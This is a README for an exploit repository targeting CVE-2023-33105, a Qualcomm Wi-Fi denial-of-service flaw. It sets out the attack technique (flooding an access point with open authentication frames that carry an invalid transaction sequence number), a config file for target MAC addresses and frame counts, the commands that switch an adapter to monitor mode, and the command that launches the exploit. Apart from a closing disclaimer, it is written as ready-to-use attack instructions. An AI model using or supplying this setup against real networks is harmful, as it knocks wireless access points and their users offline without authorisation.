This repository contains the exploit code for CVE-2023-33105, a vulnerability identified in Qualcomm devices. The exploit leverages authentication frames to perform a denial of service (DoS) attack on a target access point (AP) by sending a large number of open authentication frames with an invalid transaction sequence number.
- CVE ID: CVE-2023-33105
- Qualcomm Security Bulletin: March 2024 Bulletin
- Python 3.x
- Scapy
- Termcolor
- Airodump-ng
- A wireless network adapter capable of injection
To install the necessary Python libraries, run:
pip install -r requirements.txt
config.py
: Configuration file for setting target MAC addresses and parameters.exploit_v2.py
: Main exploit script.
Before running the exploit, update the config.py
file with the target MAC addresses and other parameters.
# config.py
# MAC address of the station (client)
sta_target = 'XX:XX:XX:XX:XX:XX' # change this
# MAC address of the access point (AP)
ap_target = 'YY:YY:YY:YY:YY:YY' # change this
# Number of frames to send
spray = 500
# Interval for checking if the BSSID is still up (in seconds)
check_interval = 60
To run the exploit, follow these steps:
- Ensure your wireless network adapter is in monitor mode. You can enable monitor mode using the following command:
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
- Execute the exploit script:
python exploit_v2.py
The script will send a large number of open authentication frames with invalid transaction sequence numbers to the target AP, causing a transient DoS.
CVE-2023-33105 is a vulnerability in Qualcomm devices that allows a transient DoS in WLAN Host and Firmware when a large number of open authentication frames are sent with an invalid transaction sequence number.
You need Python 3.x, Scapy, Airodump-ng, and a wireless network adapter capable of injection.
Unauthorized use of this script against networks without permission is illegal. This code is provided for educational purposes only.